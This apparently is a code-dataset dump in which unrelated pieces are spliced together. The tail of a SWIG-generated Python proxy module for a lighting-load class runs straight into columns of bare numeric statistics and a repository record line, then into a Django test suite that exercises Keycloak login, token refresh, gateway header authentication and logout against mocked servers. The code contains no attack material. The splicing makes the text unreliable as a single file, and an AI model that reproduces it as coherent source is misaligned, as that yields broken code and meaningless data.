    __getattr__ = lambda self, name: _swig_getattr(self, SimInternalLoad_Lights_Default, name)
    __repr__ = _swig_repr

    def __init__(self, *args):
        this = _SimInternalLoad_Lights_Default.new_SimInternalLoad_Lights_Default(*args)
        try:
            self.this.append(this)
        except:
            self.this = this

    def _clone(self, f=0, c=None):
        return _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_Default__clone(self, f, c)
    __swig_destroy__ = _SimInternalLoad_Lights_Default.delete_SimInternalLoad_Lights_Default
    __del__ = lambda self: None
# Register the proxy class with the extension module.
SimInternalLoad_Lights_Default_swigregister = _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_Default_swigregister
SimInternalLoad_Lights_Default_swigregister(SimInternalLoad_Lights_Default)
class SimInternalLoad_Lights_Default_sequence(base.sequence_common):
    """SWIG proxy for a C++ sequence (vector-like container) of
    SimInternalLoad_Lights_Default elements.

    Auto-generated by SWIG -- do not edit by hand; every method forwards
    to the compiled extension module.
    """
    __swig_setmethods__ = {}
    for _s in [base.sequence_common]:
        __swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
    __setattr__ = lambda self, name, value: _swig_setattr(self, SimInternalLoad_Lights_Default_sequence, name, value)
    __swig_getmethods__ = {}
    for _s in [base.sequence_common]:
        __swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
    __getattr__ = lambda self, name: _swig_getattr(self, SimInternalLoad_Lights_Default_sequence, name)
    __repr__ = _swig_repr

    def __init__(self, *args):
        this = _SimInternalLoad_Lights_Default.new_SimInternalLoad_Lights_Default_sequence(*args)
        try:
            self.this.append(this)
        except:
            self.this = this

    def assign(self, n, x):
        return _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_Default_sequence_assign(self, n, x)

    def begin(self, *args):
        return _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_Default_sequence_begin(self, *args)

    def end(self, *args):
        return _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_Default_sequence_end(self, *args)

    def rbegin(self, *args):
        return _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_Default_sequence_rbegin(self, *args)

    def rend(self, *args):
        return _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_Default_sequence_rend(self, *args)

    def at(self, *args):
        return _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_Default_sequence_at(self, *args)

    def front(self, *args):
        return _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_Default_sequence_front(self, *args)

    def back(self, *args):
        return _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_Default_sequence_back(self, *args)

    def push_back(self, *args):
        return _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_Default_sequence_push_back(self, *args)

    def pop_back(self):
        return _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_Default_sequence_pop_back(self)

    def detach_back(self, pop=True):
        return _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_Default_sequence_detach_back(self, pop)

    def insert(self, *args):
        return _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_Default_sequence_insert(self, *args)

    def erase(self, *args):
        return _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_Default_sequence_erase(self, *args)

    def detach(self, position, r, erase=True):
        return _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_Default_sequence_detach(self, position, r, erase)

    def swap(self, x):
        return _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_Default_sequence_swap(self, x)
    __swig_destroy__ = _SimInternalLoad_Lights_Default.delete_SimInternalLoad_Lights_Default_sequence
    __del__ = lambda self: None
# Register the proxy class with the extension module.
SimInternalLoad_Lights_Default_sequence_swigregister = _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_Default_sequence_swigregister
SimInternalLoad_Lights_Default_sequence_swigregister(SimInternalLoad_Lights_Default_sequence)
# This file is compatible with both classic and new-style classes.
| 41.805243
| 139
| 0.760796
| 1,195
| 11,162
| 6.557322
| 0.133054
| 0.292113
| 0.289433
| 0.19755
| 0.65952
| 0.630168
| 0.60171
| 0.555258
| 0.49464
| 0.29071
| 0
| 0.002148
| 0.16592
| 11,162
| 266
| 140
| 41.962406
| 0.839527
| 0.026339
| 0
| 0.323383
| 1
| 0
| 0.023761
| 0.00571
| 0
| 0
| 0
| 0
| 0
| 1
| 0.20398
| false
| 0.00995
| 0.059701
| 0.169154
| 0.60199
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
140bd4371229916c2d5f56c52a91980370ca0a17
| 35,931
|
py
|
Python
|
aether/sdk/auth/keycloak/tests/test_keycloak.py
|
eHealthAfrica/aether-django-sdk-library
|
fc371af89bfed155d465049320f32bf43860d001
|
[
"Apache-2.0"
] | 1
|
2020-05-04T21:05:11.000Z
|
2020-05-04T21:05:11.000Z
|
aether/sdk/auth/keycloak/tests/test_keycloak.py
|
eHealthAfrica/aether-django-sdk-library
|
fc371af89bfed155d465049320f32bf43860d001
|
[
"Apache-2.0"
] | 3
|
2019-09-30T15:45:43.000Z
|
2020-04-29T08:12:37.000Z
|
aether/sdk/auth/keycloak/tests/test_keycloak.py
|
eHealthAfrica/aether-django-sdk-library
|
fc371af89bfed155d465049320f32bf43860d001
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (C) 2019 by eHealth Africa : http://www.eHealthAfrica.org
#
# See the NOTICE file distributed with this work for additional information
# regarding copyright ownership.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from unittest import mock
from http.cookies import SimpleCookie
from importlib import import_module
from django.conf import settings
from django.contrib.auth import get_user_model
from django.test import RequestFactory, override_settings
from django.urls import reverse, resolve
from aether.sdk.tests import AetherTestCase
from aether.sdk.unittest import MockResponse, UrlsTestCase
from aether.sdk.utils import get_meta_http_name
from aether.sdk.auth.keycloak.utils import _KC_TOKEN_SESSION as TOKEN_KEY
from aether.sdk.auth.keycloak.views import KeycloakLogoutView
# Manager of the active user model; used below to create and inspect the
# users that the keycloak login flow provisions.
user_objects = get_user_model().objects
@override_settings(
    AUTH_URL='accounts',
    KEYCLOAK_BEHIND_SCENES=True,
)
class KeycloakBehindTests(AetherTestCase, UrlsTestCase):
    """End-to-end tests of the "behind the scenes" keycloak login flow,
    where the server exchanges username/password for keycloak tokens
    itself. Every keycloak HTTP call is mocked via exec_request."""

    def test__urls__accounts__login(self):
        """The accounts login URL resolves to Django's stock LoginView."""
        from django.contrib.auth import views
        self.assertEqual(reverse('rest_framework:login'), '/accounts/login')
        self.assertEqual(resolve('/accounts/login').func.view_class,
                         views.LoginView.as_view().view_class)

    def test__workflow(self):
        """Walk the whole login/refresh/logout lifecycle, asserting the
        exact sequence of keycloak requests at each step."""
        FAKE_TOKEN = {
            'access_token': 'access-keycloak',
            'refresh_token': 'refresh-keycloak',
        }
        REALM = 'testing'
        # login using accounts login entrypoint
        LOGIN_URL = reverse('rest_framework:login')
        SAMPLE_URL = reverse('testmodel-list')
        settings.SESSION_ENGINE = 'django.contrib.sessions.backends.file'
        engine = import_module(settings.SESSION_ENGINE)
        store = engine.SessionStore()
        store.save()
        self.client.cookies = SimpleCookie({settings.SESSION_COOKIE_NAME: store.session_key})
        self.assertIsNotNone(self.client.session)
        # visit any page that requires authentication (without being logged)
        response = self.client.get(SAMPLE_URL)
        self.assertEqual(response.status_code, 403)
        # make realm check fail
        with mock.patch('aether.sdk.auth.keycloak.utils.exec_request',
                        side_effect=[
                            # check realm request
                            MockResponse(status_code=404),
                        ]) as mock_req_1:
            response = self.client.post(LOGIN_URL, data={
                'username': 'user',
                'password': 'secretsecret',
                'realm': 'fake',
            })
            content = response.content.decode('utf-8')
            self.assertIn('Please correct the error below.', content)
            self.assertIn('Invalid realm', content)
            session = self.client.session
            self.assertIsNone(session.get(TOKEN_KEY))
            self.assertIsNone(session.get(settings.REALM_COOKIE))
            mock_req_1.assert_called_once_with(
                method='head',
                url=f'{settings.KEYCLOAK_SERVER_URL}/fake/account',
            )
        # no auth yet
        session = self.client.session
        self.assertIsNone(session.get(TOKEN_KEY))
        self.assertIsNone(session.get(settings.REALM_COOKIE))
        # make get `token` from keycloack fail
        with mock.patch('aether.sdk.auth.keycloak.utils.exec_request',
                        side_effect=[
                            # check realm request
                            MockResponse(status_code=204),
                            # get token from keycloak
                            MockResponse(status_code=400),
                        ]) as mock_req_2:
            response = self.client.post(LOGIN_URL, data={
                'username': 'user',
                'password': 'secretsecret',
                'realm': REALM,
            })
            content = response.content.decode('utf-8')
            self.assertIn('Please enter a correct username and password.', content)
            self.assertIn('Note that both fields may be case-sensitive.', content)
            mock_req_2.assert_has_calls([
                mock.call(
                    method='head',
                    url=f'{settings.KEYCLOAK_SERVER_URL}/{REALM}/account',
                ),
                mock.call(
                    method='post',
                    url=f'{settings.KEYCLOAK_SERVER_URL}/{REALM}/protocol/openid-connect/token',
                    data={
                        'grant_type': 'password',
                        'client_id': settings.KEYCLOAK_CLIENT_ID,
                        'username': 'user',
                        'password': 'secretsecret',
                    },
                ),
            ])
        # no auth yet
        session = self.client.session
        self.assertIsNone(session.get(TOKEN_KEY))
        self.assertIsNone(session.get(settings.REALM_COOKIE))
        # make get `userinfo` from keyclock fail (unlikely if `token` doesn't)
        with mock.patch('aether.sdk.auth.keycloak.utils.exec_request',
                        side_effect=[
                            # check realm request
                            MockResponse(status_code=204),
                            # get token from keycloak
                            MockResponse(status_code=200, json_data=FAKE_TOKEN),
                            # get userinfo from keycloak
                            MockResponse(status_code=404),
                        ]) as mock_req_3:
            response = self.client.post(LOGIN_URL, data={
                'username': 'user',
                'password': 'secretsecret',
                'realm': REALM,
            })
            content = response.content.decode('utf-8')
            self.assertIn('Please enter a correct username and password.', content)
            self.assertIn('Note that both fields may be case-sensitive.', content)
            mock_req_3.assert_has_calls([
                mock.call(
                    method='head',
                    url=f'{settings.KEYCLOAK_SERVER_URL}/{REALM}/account',
                ),
                mock.call(
                    method='post',
                    url=f'{settings.KEYCLOAK_SERVER_URL}/{REALM}/protocol/openid-connect/token',
                    data={
                        'grant_type': 'password',
                        'client_id': settings.KEYCLOAK_CLIENT_ID,
                        'username': 'user',
                        'password': 'secretsecret',
                    },
                ),
                mock.call(
                    method='get',
                    url=f'{settings.KEYCLOAK_SERVER_URL}/{REALM}/protocol/openid-connect/userinfo',
                    headers={'Authorization': 'Bearer {}'.format(FAKE_TOKEN['access_token'])},
                ),
            ])
        # no auth yet
        session = self.client.session
        self.assertIsNone(session.get(TOKEN_KEY))
        self.assertIsNone(session.get(settings.REALM_COOKIE))
        # finally, logs in
        with mock.patch('aether.sdk.auth.keycloak.utils.exec_request',
                        side_effect=[
                            # check realm request
                            MockResponse(status_code=204),
                            # get token from keycloak
                            MockResponse(status_code=200, json_data=FAKE_TOKEN),
                            # get userinfo from keycloak
                            MockResponse(status_code=200, json_data={
                                'preferred_username': 'user',
                                'given_name': 'given',
                                'family_name': 'family',
                                'email': 'user@example.com',
                            }),
                        ]) as mock_req_4:
            self.assertEqual(user_objects.filter(username='testing__user').count(), 0)
            response = self.client.post(LOGIN_URL, data={
                'username': 'user',
                'password': 'secretsecret',
                'realm': REALM,
            })
            self.assertEqual(user_objects.filter(username='testing__user').count(), 1)
            user = user_objects.get(username='testing__user')
            self.assertEqual(user.first_name, 'given')
            self.assertEqual(user.last_name, 'family')
            self.assertEqual(user.email, 'user@example.com')
            session = self.client.session
            self.assertEqual(session.get(TOKEN_KEY), FAKE_TOKEN)
            self.assertEqual(session.get(settings.REALM_COOKIE), REALM)
            mock_req_4.assert_has_calls([
                mock.call(
                    method='head',
                    url=f'{settings.KEYCLOAK_SERVER_URL}/{REALM}/account',
                ),
                mock.call(
                    method='post',
                    url=f'{settings.KEYCLOAK_SERVER_URL}/{REALM}/protocol/openid-connect/token',
                    data={
                        'grant_type': 'password',
                        'client_id': settings.KEYCLOAK_CLIENT_ID,
                        'username': 'user',
                        'password': 'secretsecret',
                    },
                ),
                mock.call(
                    method='get',
                    url=f'{settings.KEYCLOAK_SERVER_URL}/{REALM}/protocol/openid-connect/userinfo',
                    headers={'Authorization': 'Bearer {}'.format(FAKE_TOKEN['access_token'])},
                ),
            ])
        # visit any page that requires authentication
        with mock.patch('aether.sdk.auth.keycloak.utils.exec_request',
                        side_effect=[
                            # refresh token in keycloak
                            MockResponse(status_code=200, json_data=FAKE_TOKEN),
                        ]) as mock_req_5:
            response = self.client.get(SAMPLE_URL)
            self.assertEqual(response.status_code, 200)
            mock_req_5.assert_called_once_with(
                method='post',
                url=f'{settings.KEYCLOAK_SERVER_URL}/{REALM}/protocol/openid-connect/token',
                data={
                    'grant_type': 'refresh_token',
                    'client_id': settings.KEYCLOAK_CLIENT_ID,
                    'refresh_token': FAKE_TOKEN['refresh_token'],
                },
            )
        # visit any page that requires authentication and fails
        with mock.patch('aether.sdk.auth.keycloak.utils.exec_request',
                        side_effect=[
                            # refresh token in keycloak
                            MockResponse(status_code=400),
                            # log outs call
                            MockResponse(status_code=204),
                        ]) as mock_req_6:
            response = self.client.get(SAMPLE_URL)
            self.assertEqual(response.status_code, 403)
            mock_req_6.assert_has_calls([
                mock.call(
                    method='post',
                    url=f'{settings.KEYCLOAK_SERVER_URL}/{REALM}/protocol/openid-connect/token',
                    data={
                        'grant_type': 'refresh_token',
                        'client_id': settings.KEYCLOAK_CLIENT_ID,
                        'refresh_token': FAKE_TOKEN['refresh_token'],
                    },
                ),
                mock.call(
                    method='post',
                    url=f'{settings.KEYCLOAK_SERVER_URL}/{REALM}/protocol/openid-connect/logout',
                    data={
                        'client_id': settings.KEYCLOAK_CLIENT_ID,
                        'refresh_token': FAKE_TOKEN['refresh_token'],
                    },
                ),
            ])
        # side effect of being logged out
        session = self.client.session
        self.assertIsNone(session.get(TOKEN_KEY))
        self.assertIsNone(session.get(settings.REALM_COOKIE))
        # logs in again
        with mock.patch('aether.sdk.auth.keycloak.utils.exec_request',
                        side_effect=[
                            # check realm request
                            MockResponse(status_code=204),
                            # get token from keycloak
                            MockResponse(status_code=200, json_data=FAKE_TOKEN),
                            # get userinfo from keycloak
                            MockResponse(status_code=200, json_data={
                                'preferred_username': 'user',
                                'given_name': 'John',
                                'family_name': 'Doe',
                                'email': 'john.doe@example.com',
                            }),
                        ]):
            response = self.client.post(LOGIN_URL, data={
                'username': 'user',
                'password': 'secretsecret',
                'realm': REALM,
            })
        # user data is updated
        user = user_objects.get(username='testing__user')
        self.assertEqual(user.first_name, 'John')
        self.assertEqual(user.last_name, 'Doe')
        self.assertEqual(user.email, 'john.doe@example.com')
        # logs out
        with mock.patch('aether.sdk.auth.keycloak.utils.exec_request') as mock_req_7:
            self.client.logout()
            mock_req_7.assert_called_once_with(
                method='post',
                url=f'{settings.KEYCLOAK_SERVER_URL}/{REALM}/protocol/openid-connect/logout',
                data={
                    'client_id': settings.KEYCLOAK_CLIENT_ID,
                    'refresh_token': FAKE_TOKEN['refresh_token'],
                },
            )
        session = self.client.session
        self.assertIsNone(session.get(TOKEN_KEY))
        self.assertIsNone(session.get(settings.REALM_COOKIE))
        # logs out and visit any page again
        with mock.patch('aether.sdk.auth.keycloak.utils.exec_request') as mock_req_8:
            self.client.logout()
            self.assertEqual(self.client.get(SAMPLE_URL).status_code, 403)
            mock_req_8.assert_not_called()
@override_settings(
    AUTH_URL='accounts',
    KEYCLOAK_BEHIND_SCENES=False,
)
class KeycloakTests(UrlsTestCase):
    """Exercises the redirect-based Keycloak login flow.

    With ``KEYCLOAK_BEHIND_SCENES=False`` the login view redirects the
    browser to the Keycloak server; every HTTP call to Keycloak is mocked
    through ``aether.sdk.auth.keycloak.utils.exec_request``.
    """

    def test__urls__accounts__login(self):
        """The accounts login URL must resolve to the Keycloak login view."""
        from aether.sdk.auth.keycloak.views import KeycloakLoginView
        self.assertEqual(reverse('rest_framework:login'), '/accounts/login')
        self.assertEqual(resolve('/accounts/login').func.view_class,
                         KeycloakLoginView.as_view().view_class)

    def test__workflow(self):
        """Walks the whole login/refresh/logout cycle against mocked Keycloak.

        The mocked ``exec_request`` side effects are consumed strictly in
        order, so each ``with mock.patch`` section below mirrors the exact
        sequence of requests the SDK is expected to issue.
        """
        FAKE_TOKEN = {
            'access_token': 'access-keycloak',
            'refresh_token': 'refresh-keycloak',
        }
        REALM = 'testing'

        # login using accounts login entrypoint
        LOGIN_URL = reverse('rest_framework:login')
        SAMPLE_URL = reverse('testmodel-list')

        # use a file-backed session store so session state survives requests
        settings.SESSION_ENGINE = 'django.contrib.sessions.backends.file'
        engine = import_module(settings.SESSION_ENGINE)
        store = engine.SessionStore()
        store.save()
        self.client.cookies = SimpleCookie({settings.SESSION_COOKIE_NAME: store.session_key})
        self.assertIsNotNone(self.client.session)

        # visit any page that requires authentication (without being logged)
        response = self.client.get(SAMPLE_URL)
        self.assertEqual(response.status_code, 403)

        # make realm check fail
        with mock.patch('aether.sdk.auth.keycloak.utils.exec_request',
                        side_effect=[
                            # check realm request
                            MockResponse(status_code=404),
                        ]) as mock_req_1:
            response = self.client.post(LOGIN_URL, data={'realm': 'fake'})
            content = response.content.decode('utf-8')
            self.assertIn('Please correct the error below.', content)
            self.assertIn('Invalid realm', content)
            session = self.client.session
            self.assertIsNone(session.get(TOKEN_KEY))
            self.assertIsNone(session.get(settings.REALM_COOKIE))
            mock_req_1.assert_called_once_with(
                method='head',
                url=f'{settings.KEYCLOAK_SERVER_URL}/fake/account',
            )

        # check that the login response is a redirection to keycloak server
        with mock.patch('aether.sdk.auth.keycloak.utils.exec_request',
                        side_effect=[
                            # check realm request
                            MockResponse(status_code=204),
                        ]) as mock_req_2:
            response = self.client.post(LOGIN_URL, data={'realm': REALM})
            self.assertEqual(response.status_code, 302)
            self.assertIn(
                f'{settings.KEYCLOAK_SERVER_URL}/{REALM}/protocol/openid-connect/auth?'
                f'&client_id={settings.KEYCLOAK_CLIENT_ID}'
                '&scope=openid'
                '&response_type=code'
                '&redirect_uri=',
                response.url)
            mock_req_2.assert_called_once_with(
                method='head',
                url=f'{settings.KEYCLOAK_SERVER_URL}/{REALM}/account',
            )
            # realm is in session but not the token
            session = self.client.session
            self.assertNotIn(TOKEN_KEY, session)
            self.assertEqual(session.get(settings.REALM_COOKIE), REALM)

        # go to login page without the proper params does nothing
        self.client.get(LOGIN_URL)
        # realm is in session but not the token
        session = self.client.session
        self.assertNotIn(TOKEN_KEY, session)
        self.assertEqual(session.get(settings.REALM_COOKIE), REALM)

        # make get `token` from keycloack fail
        with mock.patch('aether.sdk.auth.keycloak.utils.exec_request',
                        side_effect=[
                            # get token from keycloak
                            MockResponse(status_code=404),
                        ]) as mock_req_3:
            # send keycloak response to login page
            response = self.client.get(LOGIN_URL + '?code=123&session_state=abc')
            mock_req_3.assert_called_once_with(
                method='post',
                url=f'{settings.KEYCLOAK_SERVER_URL}/{REALM}/protocol/openid-connect/token',
                data={
                    'grant_type': 'authorization_code',
                    'client_id': settings.KEYCLOAK_CLIENT_ID,
                    'client_session_state': 'abc',
                    'client_session_host': mock.ANY,
                    'code': '123',
                    'redirect_uri': mock.ANY,
                },
            )
            # realm is not in session
            session = self.client.session
            self.assertNotIn(TOKEN_KEY, session)
            self.assertIsNone(session.get(settings.REALM_COOKIE))

        # make get `userinfo` from keyclock fail (unlikely if `token` doesn't)
        with mock.patch('aether.sdk.auth.keycloak.utils.exec_request',
                        side_effect=[
                            # check realm request
                            MockResponse(status_code=204),
                            # get token from keycloak
                            MockResponse(status_code=200, json_data=FAKE_TOKEN),
                            # get userinfo from keycloak
                            MockResponse(status_code=404),
                        ]) as mock_req_4:
            # first step
            response = self.client.post(LOGIN_URL, data={'realm': REALM})
            # realm is in session but not the token
            session = self.client.session
            self.assertNotIn(TOKEN_KEY, session)
            self.assertEqual(session.get(settings.REALM_COOKIE), REALM)

            # second step
            response = self.client.get(LOGIN_URL + '?code=123&session_state=abc')
            content = response.content.decode('utf-8')
            self.assertIn('An error ocurred while authenticating against keycloak', content)
            # realm is not in session
            session = self.client.session
            self.assertNotIn(TOKEN_KEY, session)
            self.assertIsNone(session.get(settings.REALM_COOKIE))
            mock_req_4.assert_has_calls([
                mock.call(
                    method='head',
                    url=f'{settings.KEYCLOAK_SERVER_URL}/{REALM}/account',
                ),
                mock.call(
                    method='post',
                    url=f'{settings.KEYCLOAK_SERVER_URL}/{REALM}/protocol/openid-connect/token',
                    data={
                        'grant_type': 'authorization_code',
                        'client_id': settings.KEYCLOAK_CLIENT_ID,
                        'client_session_state': 'abc',
                        'client_session_host': mock.ANY,
                        'code': '123',
                        'redirect_uri': mock.ANY,
                    },
                ),
                mock.call(
                    method='get',
                    url=f'{settings.KEYCLOAK_SERVER_URL}/{REALM}/protocol/openid-connect/userinfo',
                    headers={'Authorization': 'Bearer {}'.format(FAKE_TOKEN['access_token'])},
                ),
            ])

        # finally, logs in
        with mock.patch('aether.sdk.auth.keycloak.utils.exec_request',
                        side_effect=[
                            # check realm request
                            MockResponse(status_code=204),
                            # get token from keycloak
                            MockResponse(status_code=200, json_data=FAKE_TOKEN),
                            # get userinfo from keycloak
                            MockResponse(status_code=200, json_data={
                                'preferred_username': 'user',
                                'given_name': 'given',
                                'family_name': 'family',
                                'email': 'user@example.com',
                            }),
                        ]) as mock_req_5:
            self.assertEqual(user_objects.filter(username='testing__user').count(), 0)
            # first step
            response = self.client.post(LOGIN_URL, data={'realm': REALM})
            # second step
            response = self.client.get(LOGIN_URL + '?code=123&session_state=abc')

            # a local user prefixed with the realm was created from userinfo
            self.assertEqual(user_objects.filter(username='testing__user').count(), 1)
            user = user_objects.get(username='testing__user')
            self.assertEqual(user.first_name, 'given')
            self.assertEqual(user.last_name, 'family')
            self.assertEqual(user.email, 'user@example.com')

            session = self.client.session
            self.assertEqual(session.get(TOKEN_KEY), FAKE_TOKEN)
            self.assertEqual(session.get(settings.REALM_COOKIE), REALM)
            mock_req_5.assert_has_calls([
                mock.call(
                    method='head',
                    url=f'{settings.KEYCLOAK_SERVER_URL}/{REALM}/account',
                ),
                mock.call(
                    method='post',
                    url=f'{settings.KEYCLOAK_SERVER_URL}/{REALM}/protocol/openid-connect/token',
                    data={
                        'grant_type': 'authorization_code',
                        'client_id': settings.KEYCLOAK_CLIENT_ID,
                        'client_session_state': 'abc',
                        'client_session_host': mock.ANY,
                        'code': '123',
                        'redirect_uri': mock.ANY,
                    },
                ),
                mock.call(
                    method='get',
                    url=f'{settings.KEYCLOAK_SERVER_URL}/{REALM}/protocol/openid-connect/userinfo',
                    headers={'Authorization': 'Bearer {}'.format(FAKE_TOKEN['access_token'])},
                ),
            ])

        # visit any page that requires authentication
        with mock.patch('aether.sdk.auth.keycloak.utils.exec_request',
                        side_effect=[
                            # refresh token in keycloak
                            MockResponse(status_code=200, json_data=FAKE_TOKEN),
                        ]) as mock_req_6:
            response = self.client.get(SAMPLE_URL)
            self.assertEqual(response.status_code, 200)
            mock_req_6.assert_called_once_with(
                method='post',
                url=f'{settings.KEYCLOAK_SERVER_URL}/{REALM}/protocol/openid-connect/token',
                data={
                    'grant_type': 'refresh_token',
                    'client_id': settings.KEYCLOAK_CLIENT_ID,
                    'refresh_token': FAKE_TOKEN['refresh_token'],
                },
            )

        # visit any page that requires authentication and fails
        with mock.patch('aether.sdk.auth.keycloak.utils.exec_request',
                        side_effect=[
                            # refresh token in keycloak
                            MockResponse(status_code=400),
                            # log outs call
                            MockResponse(status_code=204),
                        ]) as mock_req_7:
            response = self.client.get(SAMPLE_URL)
            self.assertEqual(response.status_code, 403)
            mock_req_7.assert_has_calls([
                mock.call(
                    method='post',
                    url=f'{settings.KEYCLOAK_SERVER_URL}/{REALM}/protocol/openid-connect/token',
                    data={
                        'grant_type': 'refresh_token',
                        'client_id': settings.KEYCLOAK_CLIENT_ID,
                        'refresh_token': FAKE_TOKEN['refresh_token'],
                    },
                ),
                mock.call(
                    method='post',
                    url=f'{settings.KEYCLOAK_SERVER_URL}/{REALM}/protocol/openid-connect/logout',
                    data={
                        'client_id': settings.KEYCLOAK_CLIENT_ID,
                        'refresh_token': FAKE_TOKEN['refresh_token'],
                    },
                ),
            ])

            # side effect of being logged out
            session = self.client.session
            self.assertIsNone(session.get(TOKEN_KEY))
            self.assertIsNone(session.get(settings.REALM_COOKIE))

        # logs in again
        with mock.patch('aether.sdk.auth.keycloak.utils.exec_request',
                        side_effect=[
                            # check realm request
                            MockResponse(status_code=204),
                            # get token from keycloak
                            MockResponse(status_code=200, json_data=FAKE_TOKEN),
                            # get userinfo from keycloak
                            MockResponse(status_code=200, json_data={
                                'preferred_username': 'user',
                                'given_name': 'John',
                                'family_name': 'Doe',
                                'email': 'john.doe@example.com',
                            }),
                        ]):
            # first step
            response = self.client.post(LOGIN_URL, data={'realm': REALM})
            # second step
            response = self.client.get(LOGIN_URL + '?code=123&session_state=abc')

            # user data is updated
            user = user_objects.get(username='testing__user')
            self.assertEqual(user.first_name, 'John')
            self.assertEqual(user.last_name, 'Doe')
            self.assertEqual(user.email, 'john.doe@example.com')

        # logs out
        with mock.patch('aether.sdk.auth.keycloak.utils.exec_request') as mock_req_8:
            self.client.logout()
            mock_req_8.assert_called_once_with(
                method='post',
                url=f'{settings.KEYCLOAK_SERVER_URL}/{REALM}/protocol/openid-connect/logout',
                data={
                    'client_id': settings.KEYCLOAK_CLIENT_ID,
                    'refresh_token': FAKE_TOKEN['refresh_token'],
                },
            )
            session = self.client.session
            self.assertIsNone(session.get(TOKEN_KEY))
            self.assertIsNone(session.get(settings.REALM_COOKIE))

        # logs out and visit any page again
        with mock.patch('aether.sdk.auth.keycloak.utils.exec_request') as mock_req_9:
            self.client.logout()
            self.assertEqual(self.client.get(SAMPLE_URL).status_code, 403)
            # no keycloak call is issued when there is no session token
            mock_req_9.assert_not_called()
class KeycloakGatewayTests(UrlsTestCase):
    """Exercises authentication behind an API gateway.

    Here the gateway forwards the Keycloak access token in an HTTP header
    and the SDK validates it by calling the realm's ``userinfo`` endpoint
    (mocked through ``aether.sdk.auth.keycloak.utils.exec_request``).
    """

    def test_logout(self):
        """Checks the gateway-aware logout view and its redirect rules."""
        logout_url = reverse('logout')
        self.assertEqual(logout_url, '/logout')
        self.assertNotEqual(logout_url, reverse('rest_framework:logout'))

        response = self.client.get(logout_url)
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response.template_name[0], settings.LOGGED_OUT_TEMPLATE)

        # build a request with a real (file-backed) session for the view calls
        settings.SESSION_ENGINE = 'django.contrib.sessions.backends.file'
        engine = import_module(settings.SESSION_ENGINE)
        store = engine.SessionStore()
        store.save()
        request = RequestFactory().get('/')
        setattr(request, 'session', store)

        # No next page: displays logged out template
        response = KeycloakLogoutView.as_view(
            next_page=None,
            template_name=settings.LOGGED_OUT_TEMPLATE,
        )(request)
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response.template_name[0], settings.LOGGED_OUT_TEMPLATE)

        # No realm: goes to next page
        response = KeycloakLogoutView.as_view(next_page='/check-app')(request)
        self.assertEqual(response.status_code, 302)
        self.assertEqual(response.url, '/check-app')

        # Public realm: goes to next page
        next_page = f'/{settings.GATEWAY_PUBLIC_REALM}/{settings.GATEWAY_SERVICE_ID}/check-app'
        response = KeycloakLogoutView.as_view(next_page=next_page)(request)
        self.assertEqual(response.status_code, 302)
        self.assertEqual(response.url, next_page)

        # No public realm: goes to gateway logout
        next_page = f'/realm-name/{settings.GATEWAY_SERVICE_ID}/check-app'
        response = KeycloakLogoutView.as_view(next_page=next_page)(request)
        self.assertEqual(response.status_code, 302)
        self.assertIn(
            f'/realm-name/{settings.GATEWAY_SERVICE_ID}/logout',
            response.url)

    def test_workflow(self):
        """Token-in-header flow: userinfo validation, user sync, log out."""
        FAKE_TOKEN = 'access-keycloak'
        REALM = 'testing'
        SAMPLE_URL = reverse('testmodel-list', kwargs={'realm': REALM})
        HTTP_HEADER = get_meta_http_name(settings.GATEWAY_HEADER_TOKEN)
        self.assertEqual(SAMPLE_URL, f'/{REALM}/{settings.GATEWAY_SERVICE_ID}/testtestmodel/')

        # visit any page without a valid token
        response = self.client.get(SAMPLE_URL)
        self.assertEqual(response.status_code, 403)

        # userinfo rejects the token: access denied
        with mock.patch('aether.sdk.auth.keycloak.utils.exec_request',
                        side_effect=[
                            # get userinfo from keycloak
                            MockResponse(status_code=404),
                        ]) as mock_req_1:
            response = self.client.get(SAMPLE_URL, **{HTTP_HEADER: FAKE_TOKEN})
            self.assertEqual(response.status_code, 403)
            mock_req_1.assert_called_once_with(
                method='get',
                url=f'{settings.KEYCLOAK_SERVER_URL}/{REALM}/protocol/openid-connect/userinfo',
                headers={'Authorization': f'Bearer {FAKE_TOKEN}'},
            )

        # visit any page with a valid token
        with mock.patch('aether.sdk.auth.keycloak.utils.exec_request',
                        side_effect=[
                            # get userinfo from keycloak
                            MockResponse(status_code=200, json_data={
                                'preferred_username': 'user',
                                'given_name': 'John',
                                'family_name': 'Doe',
                                'email': 'john.doe@example.com',
                            }),
                        ]) as mock_req_2:
            self.assertEqual(user_objects.filter(username='testing__user').count(), 0)
            response = self.client.get(SAMPLE_URL, **{HTTP_HEADER: FAKE_TOKEN})
            self.assertEqual(response.status_code, 200)
            # a realm-prefixed local user was created from userinfo
            self.assertEqual(user_objects.filter(username='testing__user').count(), 1)
